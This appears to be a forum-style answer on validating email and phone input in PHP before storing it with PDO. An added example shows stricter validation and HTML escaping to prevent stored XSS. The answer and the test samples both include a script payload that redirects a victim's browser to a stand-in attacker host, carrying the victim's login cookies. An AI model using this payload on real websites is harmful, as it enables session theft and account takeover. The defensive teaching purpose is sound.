While a user cannot exploit the database by means of injection, it is still vulnerable by other means.
You don't check the validity of the data you put into your database. While it is not strictly required to do so, if I submitted this as an email address or phone number:

    <script>
    window.location='http://attacker/?cookie='+document.cookie
    </script>
and you echoed this out on your website and visited it, you would be redirected, sending me your login cookies, and I could then use that data to log in as you; and if by any chance you're the site admin... This type of attack is called XSS.
As for checking the validity of the data, there are many ways to do so, but take this as an example:
    <?php
    // assumes $db is an already-opened PDO connection
    $phone = $_POST['user_phone'] ?? '';
    $email = $_POST['user_email'] ?? '';
    if (filter_var($email, FILTER_VALIDATE_EMAIL) !== false) {
        # if this is true, the email address has a correct format.
        # see the filter_var manual for more information.
        if (is_numeric($phone)) {
            $insert = $db->prepare(
                'INSERT INTO user (user_email, user_phone)
                 VALUES (:user_email, :user_phone)'
            );
            $insert->bindValue(':user_email', $email, PDO::PARAM_STR);
            $insert->bindValue(':user_phone', $phone, PDO::PARAM_STR);
            if ($insert->execute()) {
                echo 'success!';
            } else {
                echo 'failed to execute query.';
            }
        } else {
            echo 'phone number is incorrect.';
        }
    } else {
        echo 'email is not correct.';
    }
With this code, any data saved will be valid. It does not say that the email address exists, nor the phone number.
Since most XSS attacks rely on < to allow JavaScript execution, it is negated because the < character is not allowed in an email address.
My advice: check if the data is what you expect it to be before saving it, instead of storing it and fixing the security issues later.
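The validate-before-store approach from the answer above as a reusable function, written as an added example rather than code from the original answer. The function names `validate_user_input` and `render_field` and the sample inputs are constructed here; it uses a stricter phone pattern than `is_numeric()` and adds escaping on output as the second layer against XSS.

```php
<?php
// Added example, not from the original answer. Sample inputs below are constructed.

function validate_user_input(array $post): array
{
    $errors = [];
    $email = trim($post['user_email'] ?? '');
    $phone = trim($post['user_phone'] ?? '');

    // Same email check as in the answer; "<" is never valid here, so the payload is rejected.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email is not correct.';
    }
    // is_numeric() also accepts "1e5" and strings with leading whitespace, so an explicit
    // pattern is safer for a phone number: optional leading +, then 7 to 15 digits.
    if (!preg_match('/^\+?[0-9]{7,15}$/', $phone)) {
        $errors[] = 'phone number is incorrect.';
    }
    return ['ok' => $errors === [], 'errors' => $errors, 'email' => $email, 'phone' => $phone];
}

// Even validated data should be escaped when echoed into HTML (defense in depth).
function render_field(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: the payload from the answer, a phone that is_numeric() would accept,
// and a valid pair.
$samples = [
    ['user_email' => "<script>window.location='http://attacker/?cookie='+document.cookie</script>",
     'user_phone' => '12345678'],
    ['user_email' => 'alice@example.com', 'user_phone' => '1e5'],
    ['user_email' => 'alice@example.com', 'user_phone' => '+4912345678'],
];

foreach ($samples as $i => $sample) {
    $result = validate_user_input($sample);
    echo "sample $i: ", $result['ok'] ? 'valid' : implode(' ', $result['errors']), PHP_EOL;
    // htmlspecialchars() turns "<" into "&lt;", so a browser shows it as text, not markup.
    echo '  rendered email: ', render_field($sample['user_email']), PHP_EOL;
}
```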